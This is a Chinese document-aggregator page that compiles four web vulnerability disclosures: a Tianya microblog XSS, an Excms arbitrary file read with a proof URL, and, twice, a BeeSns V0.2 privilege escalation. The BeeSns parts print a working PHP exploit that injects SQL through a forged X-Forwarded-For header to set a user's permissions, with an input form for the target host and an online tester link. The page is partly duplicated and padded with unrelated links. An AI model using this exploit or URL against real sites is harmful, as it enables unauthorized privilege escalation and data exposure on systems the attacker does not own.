天涯微博系统XSS漏洞及修复方案

| 收藏本文 下载本文 作者:远离sb

下面是小编精心整理的天涯微博系统XSS漏洞及修复方案(共含4篇),希望能够帮助到大家。同时,但愿您也能像本文投稿人“远离sb”一样,积极向本站投稿分享好文章。

天涯微博系统XSS漏洞及修复方案

篇1:天涯微博系统XSS漏洞及修复方案

详细说明:参考如下URL

my.tianya.cn/#app=key_

话题参数直接通过key_XXX 传递,并且没有过滤

漏洞证明:

修复方案:

建议使用数字/hash id作为URL传参,也方便过滤

篇2:BeeSns微博系统V0.2提升权限oday+exp和修复

发布日期:-1.27

发布作者:子仪

影响版本:BeeSns V0.2

官方地址: www.beesns.com/

漏洞描述:IP过滤不严,导致用户可以提交恶意参数提升自身权限

这套微博系统风格挺不错的,个人比较喜欢,看代码是发现一些问题,直接看代码吧

01 // 获取客户端IP

02 functiongetip {

03 if(isset($_SERVER)) {

04  if(isset($_SERVER[HTTP_X_FORWARDED_FOR])) {

05   $realip= $_SERVER[HTTP_X_FORWARDED_FOR];

06  } elseif(isset($_SERVER[HTTP_CLIENT_IP])) {

07   $realip= $_SERVER[HTTP_CLIENT_IP];

08  } else{

09   $realip= $_SERVER[REMOTE_ADDR];

10  }

11 } else{

12  if(getenv(“HTTP_X_FORWARDED_FOR”)) {

13   $realip= getenv( “HTTP_X_FORWARDED_FOR”);

14  } elseif(getenv(“HTTP_CLIENT_IP”)) {

15   $realip= getenv(“HTTP_CLIENT_IP”);

16  } else{

17   $realip= getenv(“REMOTE_ADDR”);

18  }

19 }

20 $iphide=explode(“.”,$realip);

21

22 $realip=“$iphide[0].$iphide[1].$iphide[2].$iphide[3]”;//!我不明白作者写的神马东西,IP没过滤,漏洞产生

23 return$realip;

24 }

老掉牙的漏洞了,纯属YY, - -!

EXP:

01

02 print_r(

03 +---------------------------------------------------------------------------+

04 BeeSns v0.2 Getip() Remote SQL Injection Exploit

05 site:www.beesns.com

06 by 子仪

07 Blog: www.zyday.com

08

09 +---------------------------------------------------------------------------+

);

10

11 if(empty($_POST[submit])) {

12 }else{

13 error_reporting(7);

14 ini_set(max_execution_time, 0);

15 $host= $_POST[host];

16 $path= $_POST[path];

17 $username= $_POST[username];

18 $password= $_POST[password];

19 send();

20 }

21

22

23 functionsend()

24 {

25    global$host, $path,$username,$password;

26

27    $cmd= “uId=”.$username.“&uPw=”.$password;

28    $getinj=“1.1.1.1,permissions=5 where uid=$username#”;

29    $data= “POST ”.$path.“post.php?act=userLogin HTTP/1.1”;

30    $data.= “Accept: */*”;

31    $data.= “Accept-Language: zh-cn”;

32    $data.= “Content-Type: application/x-www-form-urlencoded”;

33    $data.= “User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)”;

34    $data.= “Host: $host”;

35    $data.= “Content-Length: ”.strlen($cmd).“”;

36    $data.= “Connection: Close”;

37    $data.= “X-Forwarded-For: $getinj”;

38    $data.= $cmd;

39

40    $fp= fsockopen($host, 80);

41    fputs($fp, $data);

42

43    $resp= ;

44

45    while($fp&& !feof($fp))

46        $resp.= fread($fp, 1024);

47

48 if(preg_match(#(.*)charset=utf-8(.*)1(.*)1(.*)0(.*)#Uis,$resp)){

49  echo“

提升权限成功!”;

50 }else{

51  echo“Failed!”;

52 }

53

54 }

55 ?>

56

57 目标地址:*请勿加

58 二级目录:*如果不是二级目录,请保持默认

59 用户名:*您在目标站申请的用户名,建议用小号测试

60 密码:

61

62

修复:IP过滤

篇3:Excms卓越内容管理系统爆任意文件漏洞及修复方案漏洞预警

详细说明:$_GET['file']过滤不严格,爆任意文件

漏洞证明:www.excms.cn/apps/include.php?file=index.php

修复方案:对$_GET['file']进行严格过滤

作者 路人甲@乌云@乌云

篇4:BeeSns微博系统V0.2提升权限0day and exp漏洞预警

发布作者:子仪

影响版本:BeeSns V0.2

官方地址: www.beesns.com/

漏洞类型:权限提升

漏洞分析:IP过滤不严,导致用户可以提交恶意参数提升自身权限,

BeeSns微博系统V0.2提升权限0day and exp漏洞预警

。这套微博系统风格挺不错的,个人比较喜欢,看代码是发现一些问题,直接看代码吧

// 获取客户端IP function getip() { if (isset($_SERVER)) { if (isset($_SERVER[HTTP_X_FORWARDED_FOR])) { $realip = $_SERVER[HTTP_X_FORWARDED_FOR]; } elseif (isset($_SERVER[HTTP_CLIENT_IP])) { $realip = $_SERVER[HTTP_CLIENT_IP]; } else { $realip = $_SERVER[REMOTE_ADDR]; } } else { if (getenv(“HTTP_X_FORWARDED_FOR”)) { $realip = getenv( “HTTP_X_FORWARDED_FOR”); } elseif (getenv(“HTTP_CLIENT_IP”)) { $realip = getenv(“HTTP_CLIENT_IP”); } else { $realip = getenv(“REMOTE_ADDR”); } } $iphide=explode(“.”,$realip); $realip=“$iphide[0].$iphide[1].$iphide[2].$iphide[3]”;//!我不明白作者写的神马东西,IP没过滤,漏洞产生 return $realip; }

EXP:

BeeSns v0.2 Getip() Remote SQL Injection Exploit

site:www.beesns.com

by 子仪

Blog: www.zyday.com

+---------------------------------------------------------------------------+

'); if (empty($_POST[submit])) { }else{ error_reporting(7); ini_set('max_execution_time', 0); $host = $_POST[host]; $path = $_POST[path]; $username = $_POST[username]; $password = $_POST[password]; send(); } function send() { global $host, $path,$username,$password; $cmd = “uId=”.$username.“&uPw=”.$password; $getinj=“1.1.1.1',permissions=5 where uid='$username'#”; $data = “POST ”.$path.“post.php?act=userLogin HTTP/1.1rn”; $data .= “Accept: */*rn”; $data .= “Accept-Language: zh-cnrn”; $data .= “Content-Type: application/x-www-form-urlencodedrn”; $data .= “User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)rn”; $data .= “Host: $hostrn”; $data .= “Content-Length: ”.strlen($cmd).“rn”; $data .= “Connection: Closern”; $data .= “X-Forwarded-For: $getinjrnrn”; $data .= $cmd; $fp = fsockopen($host, 80); fputs($fp, $data); $resp = ''; while ($fp && !feof($fp)) $resp .= fread($fp, 1024); if(preg_match('#(.*)charset=utf-8(.*)1(.*)1(.*)0(.*)#Uis',$resp)){ echo “

提升权限成功!”; }else{ echo “Failed!”; } } ?> 目标地址:*请勿加%3cbr/“>

二级目录:*如果不是二级目录,请保持默认

用户名:*您在目标站申请的用户名,建议用小号测试

密码:

如果本地无PHP环境,可使用在线EXP测试:点击进入

微博营销方案

维普网持久型xss漏洞及修复方案

微博活动方案格式

党建微博活动方案

修复更新grub2系统引导

经典微博语录及赏析

微博签名

微博语录

范文芳微博

微博征文

天涯微博系统XSS漏洞及修复方案(共4篇)

欢迎下载DOC格式的天涯微博系统XSS漏洞及修复方案,但愿能给您带来参考作用!
推荐度: 推荐 推荐 推荐 推荐 推荐
点击下载文档 文档为doc格式
点击下载本文文档